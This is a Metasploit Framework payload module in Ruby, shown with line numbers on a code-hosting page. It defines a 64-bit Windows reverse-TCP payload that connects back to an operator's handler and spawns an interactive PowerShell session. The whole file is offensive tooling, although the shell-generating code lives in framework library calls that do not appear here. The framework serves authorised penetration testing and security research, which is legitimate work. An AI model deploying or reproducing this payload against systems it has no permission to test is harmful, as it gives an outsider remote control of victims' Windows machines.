Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
require 'rex/powershell'
6

7
module MetasploitModule
8
  CachedSize = :dynamic
9

10
  include Msf::Payload::Windows::Exec_x64
11
  include Msf::Payload::Windows::Powershell
12
  include Rex::Powershell::Command
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
19
        'Description' => 'Listen for a connection and spawn an interactive powershell session',
20
        'Author' => [
21
          'Ben Turner', # benpturner
22
          'Dave Hardy' # davehardy20
23
        ],
24
        'References' => [
25
          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit']
26
        ],
27
        'License' => MSF_LICENSE,
28
        'Platform' => 'win',
29
        'Arch' => ARCH_X64,
30
        'Handler' => Msf::Handler::ReverseTcp,
31
        'Session' => Msf::Sessions::PowerShell
32
      )
33
    )
34

35
  end
36

37
  #
38
  # Override the exec command string
39
  #
40
  def powershell_command
41
    generate_powershell_code('Reverse')
42
  end
43
end
44

45